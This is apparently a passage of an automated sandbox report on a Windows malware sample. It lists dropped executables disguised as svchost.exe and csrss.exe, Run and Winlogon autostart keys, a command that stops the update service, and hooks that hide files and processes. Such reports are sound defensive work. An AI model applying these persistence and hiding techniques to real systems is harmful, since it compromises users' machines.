Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Drops PE files with benign system names

Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe	File created: C:\ProgramData\svchost.exe			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe			Jump to dropped file

Infects executable files (exe, dll, sys, html)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

System file written: C:\Windows\System32\SecurityHealthSystray.exe

Source: C:\ProgramData\Microsoft\based.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66642\_sqlite3.pyd	Jump to dropped file
Source: C:\Recovery\HpQPPZazcv.exe	File created: C:\Users\user\Desktop\sNdMsyHA.log	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Windows\System32\SecurityHealthSystray.exe	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66642\_bz2.pyd	Jump to dropped file
Source: C:\Recovery\HpQPPZazcv.exe	File created: C:\Users\user\Desktop\jLnWNQxJ.log	Jump to dropped file
Source: C:\ProgramData\Microsoft\hacn.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66162\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\etRnODSa.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\itfeGmlQ.log	Jump to dropped file
Source: C:\Recovery\HpQPPZazcv.exe	File created: C:\Users\user\Desktop\nQMnEjGz.log	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66642\_queue.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\wPQtSLGm.log	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66642\rar.exe	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66642\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\sTOcLgQt.log	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66642\sqlite3.dll	Jump to dropped file
Source: C:\Recovery\HpQPPZazcv.exe	File created: C:\Users\user\Desktop\VmdPWrri.log	Jump to dropped file
Source: C:\ProgramData\Microsoft\hacn.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66162\python310.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\flhVkUrV.log	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\eodmidm4\eodmidm4.dll	Jump to dropped file
Source: C:\Recovery\HpQPPZazcv.exe	File created: C:\Users\user\Desktop\JmBJbHgR.log	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66642\libcrypto-1_1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\JryrolxS.log	Jump to dropped file
Source: C:\Recovery\HpQPPZazcv.exe	File created: C:\Users\user\Desktop\qBrDLwRs.log	Jump to dropped file
Source: C:\ProgramData\svchost.exe	File created: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Jump to dropped file
Source: C:\Recovery\HpQPPZazcv.exe	File created: C:\Users\user\Desktop\RXtRpjXE.log	Jump to dropped file
Source: C:\ProgramData\Microsoft\hacn.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66162\_bz2.pyd	Jump to dropped file
Source: C:\ProgramData\Microsoft\hacn.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66162\_hashlib.pyd	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66642\libssl-1_1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe	File created: C:\ProgramData\svchost.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\jHNEqIuO.log	Jump to dropped file
Source: C:\Recovery\HpQPPZazcv.exe	File created: C:\Users\user\Desktop\oXnVlCHH.log	Jump to dropped file
Source: C:\Recovery\HpQPPZazcv.exe	File created: C:\Users\user\Desktop\tcMmcUQx.log	Jump to dropped file
Source: C:\ProgramData\Microsoft\hacn.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66162\libcrypto-1_1.dll	Jump to dropped file
Source: C:\Recovery\HpQPPZazcv.exe	File created: C:\Users\user\Desktop\tKFUOyWv.log	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66642\unicodedata.pyd	Jump to dropped file
Source: C:\Recovery\HpQPPZazcv.exe	File created: C:\Users\user\Desktop\JSejfBbH.log	Jump to dropped file
Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	File created: C:\ProgramData\Microsoft\based.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Program Files\Windows Defender\en-US\based.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\QYTGHhqw.log	Jump to dropped file
Source: C:\Recovery\HpQPPZazcv.exe	File created: C:\Users\user\Desktop\SUVZKjmy.log	Jump to dropped file
Source: C:\Recovery\HpQPPZazcv.exe	File created: C:\Users\user\Desktop\djIfBqMY.log	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66642\python310.dll	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66642\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\bmTftlYf.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\MZFQQyWG.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe	File created: C:\ProgramData\setup.exe	Jump to dropped file
Source: C:\Recovery\HpQPPZazcv.exe	File created: C:\Users\user\Desktop\ifKwJWCS.log	Jump to dropped file
Source: C:\Recovery\HpQPPZazcv.exe	File created: C:\Users\user\Desktop\GLhaJjhM.log	Jump to dropped file
Source: C:\ProgramData\Microsoft\hacn.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66162\_decimal.pyd	Jump to dropped file
Source: C:\ProgramData\Microsoft\hacn.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66162\select.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\cACFdGgc.log	Jump to dropped file
Source: C:\Recovery\HpQPPZazcv.exe	File created: C:\Users\user\Desktop\pUOdHCWB.log	Jump to dropped file
Source: C:\Recovery\HpQPPZazcv.exe	File created: C:\Users\user\Desktop\EqAsTbqX.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Windows\Prefetch\HpQPPZazcv.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\XWHGkwkl.log	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66642\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\vIRlNZYv.log	Jump to dropped file
Source: C:\ProgramData\Microsoft\hacn.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe	Jump to dropped file
Source: C:\Recovery\HpQPPZazcv.exe	File created: C:\Users\user\Desktop\xiBLBWku.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\xnytOABw.log	Jump to dropped file
Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	File created: C:\ProgramData\Microsoft\hacn.exe	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66642\libffi-7.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\KWThvPSL.log	Jump to dropped file
Source: C:\ProgramData\setup.exe	File created: C:\Program Files\Google\Chrome\updater.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\xGttiZnp.log	Jump to dropped file
Source: C:\Recovery\HpQPPZazcv.exe	File created: C:\Users\user\Desktop\LXhZiUrJ.log	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66642\VCRUNTIME140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\BLFrfvoX.log	Jump to dropped file
Source: C:\ProgramData\Microsoft\hacn.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66162\VCRUNTIME140.dll	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66642\_ssl.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\AwjkpWnj.log	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66642\_socket.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Recovery\powershell.exe	Jump to dropped file
Source: C:\Recovery\HpQPPZazcv.exe	File created: C:\Users\user\Desktop\FuissdNI.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\IsmZtopJ.log	Jump to dropped file
Source: C:\ProgramData\Microsoft\hacn.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66162\_socket.pyd	Jump to dropped file
Source: C:\ProgramData\Microsoft\hacn.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66162\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\hwDWkmWW.log	Jump to dropped file
Source: C:\Recovery\HpQPPZazcv.exe	File created: C:\Users\user\Desktop\eGaXQvvb.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Recovery\HpQPPZazcv.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\ViDyzjon.log	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66642\_lzma.pyd	Jump to dropped file
Source: C:\Recovery\HpQPPZazcv.exe	File created: C:\Users\user\Desktop\VuNhAaSo.log	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66642\select.pyd	Jump to dropped file
Source: C:\ProgramData\setup.exe	File created: C:\Users\user\AppData\Local\Temp\wxyubnjmnlae.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\wYntCyZj.log	Jump to dropped file

Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	File created: C:\ProgramData\Microsoft\based.exe	Jump to dropped file
Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	File created: C:\ProgramData\Microsoft\hacn.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe	File created: C:\ProgramData\setup.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe	File created: C:\ProgramData\svchost.exe	Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Windows\System32\SecurityHealthSystray.exe			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Windows\Prefetch\HpQPPZazcv.exe			Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\xnytOABw.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\vIRlNZYv.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\bmTftlYf.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\AwjkpWnj.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\xGttiZnp.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\etRnODSa.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\KWThvPSL.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\JryrolxS.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\hwDWkmWW.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\flhVkUrV.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\MZFQQyWG.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\cACFdGgc.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\itfeGmlQ.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\wPQtSLGm.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\sTOcLgQt.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\QYTGHhqw.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\XWHGkwkl.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\IsmZtopJ.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\jHNEqIuO.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\wYntCyZj.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\ViDyzjon.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\BLFrfvoX.log	Jump to dropped file
Source: C:\Recovery\HpQPPZazcv.exe	File created: C:\Users\user\Desktop\xiBLBWku.log	Jump to dropped file
Source: C:\Recovery\HpQPPZazcv.exe	File created: C:\Users\user\Desktop\sNdMsyHA.log	Jump to dropped file
Source: C:\Recovery\HpQPPZazcv.exe	File created: C:\Users\user\Desktop\ifKwJWCS.log	Jump to dropped file
Source: C:\Recovery\HpQPPZazcv.exe	File created: C:\Users\user\Desktop\RXtRpjXE.log	Jump to dropped file
Source: C:\Recovery\HpQPPZazcv.exe	File created: C:\Users\user\Desktop\oXnVlCHH.log	Jump to dropped file
Source: C:\Recovery\HpQPPZazcv.exe	File created: C:\Users\user\Desktop\djIfBqMY.log	Jump to dropped file
Source: C:\Recovery\HpQPPZazcv.exe	File created: C:\Users\user\Desktop\LXhZiUrJ.log	Jump to dropped file
Source: C:\Recovery\HpQPPZazcv.exe	File created: C:\Users\user\Desktop\tKFUOyWv.log	Jump to dropped file
Source: C:\Recovery\HpQPPZazcv.exe	File created: C:\Users\user\Desktop\SUVZKjmy.log	Jump to dropped file
Source: C:\Recovery\HpQPPZazcv.exe	File created: C:\Users\user\Desktop\JmBJbHgR.log	Jump to dropped file
Source: C:\Recovery\HpQPPZazcv.exe	File created: C:\Users\user\Desktop\pUOdHCWB.log	Jump to dropped file
Source: C:\Recovery\HpQPPZazcv.exe	File created: C:\Users\user\Desktop\EqAsTbqX.log	Jump to dropped file
Source: C:\Recovery\HpQPPZazcv.exe	File created: C:\Users\user\Desktop\eGaXQvvb.log	Jump to dropped file
Source: C:\Recovery\HpQPPZazcv.exe	File created: C:\Users\user\Desktop\tcMmcUQx.log	Jump to dropped file
Source: C:\Recovery\HpQPPZazcv.exe	File created: C:\Users\user\Desktop\VuNhAaSo.log	Jump to dropped file
Source: C:\Recovery\HpQPPZazcv.exe	File created: C:\Users\user\Desktop\jLnWNQxJ.log	Jump to dropped file
Source: C:\Recovery\HpQPPZazcv.exe	File created: C:\Users\user\Desktop\GLhaJjhM.log	Jump to dropped file
Source: C:\Recovery\HpQPPZazcv.exe	File created: C:\Users\user\Desktop\VmdPWrri.log	Jump to dropped file
Source: C:\Recovery\HpQPPZazcv.exe	File created: C:\Users\user\Desktop\JSejfBbH.log	Jump to dropped file
Source: C:\Recovery\HpQPPZazcv.exe	File created: C:\Users\user\Desktop\qBrDLwRs.log	Jump to dropped file
Source: C:\Recovery\HpQPPZazcv.exe	File created: C:\Users\user\Desktop\nQMnEjGz.log	Jump to dropped file
Source: C:\Recovery\HpQPPZazcv.exe	File created: C:\Users\user\Desktop\FuissdNI.log	Jump to dropped file

Boot Survival

Creates an autostart registry key pointing to binary in C:\Windows

Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe

Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run HpQPPZazcv

Creates an undocumented autostart registry key

Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell

Creates autostart registry keys with suspicious values (likely registry only malware)

Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run powershell "C:\Recovery\powershell.exe"
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run powershell "C:\Recovery\powershell.exe"

Creates multiple autostart registry keys

Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run based
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run csrss
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run HpQPPZazcv
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run powershell

Source: C:\ProgramData\Microsoft\based.exe

File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr

Jump to behavior

Source: C:\ProgramData\Microsoft\based.exe

File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run HpQPPZazcv
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run HpQPPZazcv
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run powershell
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run powershell
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run powershell
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run powershell
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run based
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run based
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run csrss
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run csrss
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run csrss
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run csrss
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run HpQPPZazcv
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run HpQPPZazcv

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\sc.exe sc stop UsoSvc

Hooking and other Techniques for Hiding and Protection

Found hidden mapped module (file has been removed from disk)

Source: C:\ProgramData\setup.exe

Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\WXYUBNJMNLAE.TMP

Hooks files or directories query functions (used to hide files and directories)

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile

Hooks processes query functions (used to hide processes)

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation

Hooks registry keys query functions (used to hide registry keys)

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
